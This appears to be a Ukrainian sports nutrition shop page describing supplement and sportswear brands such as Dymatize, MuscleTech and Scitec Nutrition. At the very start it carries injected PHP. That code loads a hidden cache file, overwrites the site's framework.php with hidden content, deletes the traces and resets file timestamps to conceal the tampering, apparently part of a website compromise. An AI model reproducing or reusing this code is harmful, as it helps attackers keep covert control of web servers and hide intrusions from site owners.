$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Виробники спортивного харчування та одягу | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Виробники спортивного харчування та одягу

Better Bodies – спортивний одяг для жінок та чоловіків. На початку восьмидесятих Better Bodies була заснована паном Брайяном Моссом, дуже відомим «фітнес-гуру» у Нью-Йорку. Better Bodies почалась як модельне агентство для фітнес-моделей і стала дуже успішною та добре відомою в США.
Сьогодні Better Bodies є одним з найкращих брендів у тренажерному залі та у промисловості спортивного одягу в усьому світі!
Висока якість, функціональність та дизайн зроблені з великим розумінням потреб та вимог спортсменів. Адже саме вони знають, що зручніше носити під час інтенсивних тренувань, а також у повсякденному житті.

California fitness Company Limited була заснована у 1991 році з дуже простою метою – забезпечити високу якість спортивного харчування за доступною ціною. Сьогодні продукція компанії продається більш ніж у сорока країнах на трьох континентах, доводячи, що місія компанії, забезпечити краще спортивне харчування, була, є і буде залишатися першочерговим завданням.
Як California fitness це робить? Дуже просто. Без надмірностей, без хитрощів, без величезних рекламних бюджетів. Спортивне харчування California fitness не містить консервантів, наповнювачів або підсолоджувачів. Лише найкращі та найкорисніші інгредієнти, які допоможуть вам досягнути своєї мети.

Cytogen – це дочірній бренд компанії Scitec Nutrition. В лінійці цих продуктів виробники постарались реалізувати всі свої самі найкращі напрацювання в області якості та ефективності спортивного харчування.

Dymatize була заснована у 1994 році для постачання найвищої якості спортивним харчуванням спортсменів по усьому світу від футболу, баскетболу, хокею та бейсбольних команд до американських державних організацій, таких як військово-морська академія США. Одна з переваг у таких постачаннях є те, що багато організацій мають власні випробувальні центри, де спортивне харчування Dymatize постійно оцінюється.
По цій причині ми вважаємо, що Dymatize отримує саме незалежне тестування спортивного харчування. Нещодавно Dymatize почав пропонувати це ж харчування, яке використовується спортсменами світового класу, для широког суспільства. Розробляючи і пропонуючи нове спортивне харчування, Dymatize продовжує підтримувати найвищу якість.

Чоловіча спортивна одежа GASP – найкращий вибір для бодібілдингу та фітнесу. GASP – це не тільки бренд, який постійно розширює своє виробництво, але й створює для вас стиль життя.
Наш спортивний одяг розробляється та виробляється без компромісів. Ми робимо спортивний одяг з великою скрупульозністю, щоб ви відчували себе комфортно і зручно.
Спортивний одяг Gasp створює для вас новий стиль життя, який допоможе вам себе проявити.

Mad Max – це марка, яка добре утвердилась на ринку і досить відома більш ніж у 30 країнах світу. В асортименті Mad Max є більш ніж 85 найменувань спортивного одягу і аксесуарів. Ми поступово вводили багато нововведень і наступні досягнення стали найважливішими. Вони не тільки вплинули на розвиток спортивного одягу і аксесуарів Mad Max, але й також вплинули на всю нашу діяльність:

- власна «інтелектуальна концепція» для розвитку нового спортивного одягу та аксесуарів;
- використання охолоджуючих та швидко висихаючи тканин;
-введення чіпів RFID для ідентифікації у перчатках.

Mad Max створила спеціальну колекцію "Dangerous Game" для професійних жорстких тренувань, колекцію іншого діапазону "TATTOO" для активних жінок і особливий комплект спортивного одягу і аксесуарів "A Fight to the Death" для боксу, бойових мистецтв, фітнес-боксингу та інших областей аеробіки, заснованих на боксі. Mad Max пишається тим фактом, що спортивним одягом та аксесуарами користуються першокласні спортсмени, і Mad Max може покластись на їхній цінний досвід, поради та рекомендації, розробляючи новий спортивний одяг та аксесуари.
Приготуйтесь дивуватися!

MHP – це те, до чого ви прагнете.
MHP залишився вірним своїй меті – абсолютно висока якість та найбільш ефективне спортивне харчування, яке тільки може запропонувати наука для досягнення максимальних результатів.

 

MuscleTech відомий американський виробник спортивного харчування. Формула нового професійного спортивного харчування була ретельно розроблена дослідниками світового класу MuscleTech, щоб задовільнити потреби починаючих та професійних спортсменів. MuscleTech – це справжня наука, реальні люди, високі результати.

 

NUTREX RESEARCH засновано у 2002 році. Увага NUTREX завжди була зосереджена на передових розробках спортивного харчування. NUTREX була першою компанією по випуску рідинних капсул. А всі інші були зайняті тим, що копіювали наші розробки та економили час і ресурси. Спортивне харчування NUTREX завжди буде на високому рівні. Ми будемо продовжувати роботу, щоб зробити спортивне харчування ще кращим.

Pro Nutrition зявився на світ в 1999 році, коли у Румунії повністю було відсутнє виробництво спортивного харчування. Pro Nutrition, який постійно розвивається, довів свій високий стандарт якості. А спортивне харчування Pro Nutrition не лише саме ефективне, але й саме смачне. Крім того, спортивне харчування Pro Nutrition легко засвоюється, маючи високу біологічну цінність. Компоненти наших продуктів привозять з ЄС з наданням сертифікату якості ISO 9001. Мета Pro Nutrition є у сприяні фізичним вправам, доповненим здоровим харчуванням. Діяльність Pro Nutrition сконцентрована на одному: ефективне використання біологічно активних добавок у поєднані з професійною підготовкою для ведення здорового способу життя.

Pro Nutrition пропонує Вам широкий спектр біологічно активних добавок, як безпечне спортивне харчування і за низькою ціною.Ми бажаємо вам бути повністю впевненими у тому, що спортивне харчування Pro Nutrition, яке ви купуєте, виправдає ваші очікування.

SAN – спортивне харчування, яке допомагає спортсменам збільшити м’язову масу, зменшити кількість жиру в тілі та покращити спортивні показники з 1996 року. SAN завоювала заслужену репутацію передового лідера, тому що ми постійно підтримуємо високу якість та найбільш інноваційне спортивне харчування на ринку. Опираючись на обширні наукові дослідження, поряд з практичним застосуванням, SAN постійно піднімає планку у розвитку самого потужного і безпечного спортивного харчування у світі. Ми ніколи не зупиняємося і завжди прагнемо до більших досягнень. SANпобудована на основі якості, інновацій та обслуговування клієнтів, які використовують наше спортивне харчування. Спортивне харчування SAN фактично дає реальні результати!

Scitec Nutrition випускає спортивне харчування лише перевірене та безпечне. Scitec Nutrition інвестує значні ресурси у дослідження та розвиток. Наше спортивне харчування містить формули та інгредієнти, які зарекомендували себе найкраще. Дослідники Scitec Nutrition розробили ряд оригінального спортивного харчування дякуючи найновішим розробкам і високим технологіям.

Universal Nutrition була головним виробником спортивног харчування з 1977 року. Місія Universal Nutrition в забезпечені високої якості спортивного харчування по конкурентних цінах. Ми хочемо бути партнерами в зусиллях по розвитку Вашого потенціалу та досягнення більш сильного та красивого тіла.
Перш за все, Universal Nutrition цінить якість, рівень сервісу, оперативність, надійність та новаторство.

American Muscle – це дочірній бренд компанії Scitec Nutrition. В лінійці цих продуктів виробники постарались реалізувати всі свої самі найкращі напрацювання в області якості та ефективності спортивного харчування.

 

 
Спортивне харчування Виробники спортивного харчування та одягу